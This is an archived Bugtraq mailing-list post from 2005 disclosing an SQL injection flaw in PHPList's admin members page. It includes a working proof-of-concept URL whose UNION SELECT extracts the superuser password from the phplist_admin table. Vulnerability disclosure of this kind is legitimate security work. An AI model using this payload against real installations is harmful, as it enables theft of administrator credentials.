[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    PHPList Vunerability
From:       ziot () whataboutpp ! com
Date:       2005-07-31 23:02:38
Message-ID: 20050731230238.22060.qmail () securityfocus ! com
[Download RAW message or body]

http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password


Although not completely open because one must authenticate, but completely leaves the \
database open.. thus being a SQL Injection hole.


[prev in list] [next in list] [prev in thread] [next in thread]